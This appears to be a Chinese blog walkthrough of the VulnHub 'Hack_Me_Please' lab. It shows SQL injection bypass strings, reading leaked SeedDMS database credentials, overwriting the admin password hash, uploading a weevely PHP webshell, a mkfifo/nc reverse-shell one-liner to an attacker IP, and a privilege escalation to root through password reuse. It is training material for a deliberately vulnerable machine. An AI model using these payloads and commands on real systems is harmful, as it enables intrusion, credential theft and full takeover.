Hack_Me_Please，js信息泄露，二级目录遍历-泷羽Sec

【oscp】Hack_Me_Please，js信息泄露，二级目录遍历

靶机地址：https://www.vulnhub.com/entry/hack-me-please-1,731/

外网打点

主机发现&端口扫描

80端口这是一个静态页面

mysql测试是否可以远程连接（可）

Tips ：ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain，这个错误表示客户端与服务器之间建立安全连接时出现的SSL/TLS 证书验证错误

解决办法通常有两种方法：

添加参数 –skip-ssl
添加参数 –ssl-mode=DISABLED

目录扫描看到一个html，不是php写的，进行目录爆破的时候就需要用到wfuzz或者gobuster

既然是静态页面，那么我们直接打开控制台，这里注释信息有一个 /seeddms51x/seeddms-5.1.22/

//确保这个js文件与我们服务器端点上安装的应用相同：/seeddms51x/seeddms-5.1.22/

访问这个应用

http://10.10.10.201/seeddms51x/seeddms-5.1.22/

经过一些列折腾后

' or 1=1 --+
' or 1=1 -- +
' or 1=1#
" or 1=1 --+
" or 1=1 -- +
" || 1=1 -- +
" || 1=1 --+
" || 1=1 #

继续信息收集，发现可以对这个上级目录进行扫描

gobuster dir -u http://10.10.10.201/seeddms51x -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-1.0.txt -x html,txt,php,js

开放了，三个目录

/conf
/www
/pear

/conf/settings.xml

丢给AI总结（注意oscp考试绝对不允许使用AI）

有了数据库密码，那么就远程登录

┌──(root㉿kali)-[/data/demo]
└─# mysql -u seeddms -h 10.10.10.201 --skip-ssl -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or g.
Your MySQL connection id is 72
Server version: 8.0.25-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| seeddms            |
| sys                |
+--------------------+
5 rows in set (0.006 sec)

MySQL [(none)]> use seeddms
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [seeddms]> show tables;
+------------------------------+
| Tables_in_seeddms            |
+------------------------------+
| tblACLs                      |
| tblAttributeDefinitions      |
| tblCategory                  |
| tblDocumentApproveLog        |
-------------------------------------------
| tblWorkflowTransitions       |
| tblWorkflows                 |
| users                        |
+------------------------------+
43 rows in set (0.002 sec)

MySQL [seeddms]> select * from users;
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
|           1 | saket               | saurav             | Saket@#$1337    |
+-------------+---------------------+--------------------+-----------------+
1 row in set (0.002 sec)

发现Saket@#$1337登录不成功


MySQL [seeddms]> select * from tblUsers;
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| id | login | pwd                              | fullName      | email              | language | theme | comment | role | hidden | pwdExpiration       | loginfailures | disabled | quota | homefolder |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
|  1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | address@server.com | en_GB    |       |         |    1 |      0 | 2021-07-13 00:12:25 |             0 |        0 |     0 |       NULL |
|  2 | guest | NULL                             | Guest User    | NULL               |          |       |         |    2 |      0 | NULL                |             0 |        0 |     0 |       NULL |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
2 rows in set (0.001 sec)

解密失败，那还有一种方法就是修改数据了修改密码为123456 md5加密后e10adc3949ba59abbe56e057f20f883e

update tblUsers set pwd='e10adc3949ba59abbe56e057f20f883e' where login='admin';

修改后就能登录了

在mysql中还有一个信息是必须要收集的（这个配置不当能够直接getshell）

MySQL [seeddms]> SHOW VARIABLES LIKE 'secure_file_priv';
+------------------+-----------------------+
| Variable_name    | Value                 |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
1 row in set (0.019 sec)

继续登录的后台，点击添加文档，发现能上传文件

我们使用weevely生成一个php静态木马（它具有跨平台、隐蔽性好[增加免杀率]、支持多种功能等特点）

weevely generate cmd shell.php

把他上传上去

那么这个shell路径怎么获取呢，这里可以检索一下历史漏洞，这里有一个命令执行

查看一下

需要获取文档ID

 example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd

完整payload如下

http://10.10.10.201/seeddms51x/data/1048576/10/1.php

内网渗透

使用weevely连接webshell

weevely terminal http://10.10.10.201/seeddms51x/data/1048576/10/1.php cmd

反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f

创建交互式终端

python2 -c 'import pty; pty.spawn("/bin/bash")';

内网信息收集的时候，看到一个logrotate计划任务

www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ ls -al /etc/cron*
ls -al /etc/cron*
-rw-r--r-- 1 root root 1042 Feb 13  2020 /etc/crontab

/etc/cron.d:
total 36
drwxr-xr-x   2 root root  4096 Jul  2  2021 .
drwxr-xr-x 133 root root 12288 Jul  3  2021 ..
-rw-r--r--   1 root root   102 Feb 13  2020 .placeholder
-rw-r--r--   1 root root   285 Jul 16  2019 anacron
-rw-r--r--   1 root root   201 Feb 13  2020 e2scrub_all
-rw-r--r--   1 root root   712 Jun 20  2021 php
-rw-r--r--   1 root root   191 Jul  2  2021 popularity-contest

/etc/cron.daily:
total 68
drwxr-xr-x   2 root root  4096 Jul  2  2021 .
drwxr-xr-x 133 root root 12288 Jul  3  2021 ..
-rw-r--r--   1 root root   102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root   311 Jul 16  2019 0anacron
-rwxr-xr-x   1 root root   539 Apr 13  2020 apache2
-rwxr-xr-x   1 root root   376 Dec  4  2019 apport
-rwxr-xr-x   1 root root  1478 Apr  9  2020 apt-compat
-rwxr-xr-x   1 root root   355 Dec 29  2017 bsdmainutils
-rwxr-xr-x   1 root root   384 Nov 19  2019 cracklib-runtime
-rwxr-xr-x   1 root root  1187 Sep  5  2019 dpkg
-rwxr-xr-x   1 root root   377 Jan 21  2019 logrotate
-rwxr-xr-x   1 root root  1123 Feb 25  2020 man-db
-rwxr-xr-x   1 root root  4574 Jul 18  2019 popularity-contest
-rwxr-xr-x   1 root root   214 Dec  7  2020 update-notifier-common

www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ logrotate --version
logrotate --version
logrotate 3.14.0

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes

很遗憾，这个利用不了，版本太新（高）了

然后我想到了刚进来的那个网页moonlight，这里有一个权限提升

POC为c#计算机语言，大概率不适用于linux

想想看哪里还没有利用这是之前mysql中的用户表，存在一个用户

Saket@#$1337

我们查看/etc/passwd，是存在这个用户的

www-data@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ su saket
su saket
Password: Saket@#$1337

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$

saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -l
sudo -l
[sudo] password for saket: Saket@#$1337

Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User saket may run the following commands on ubuntu:
    (ALL : ALL) ALL
saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -i
sudo -i
root@ubuntu:~# whoami
whoami
root

至此提权成功。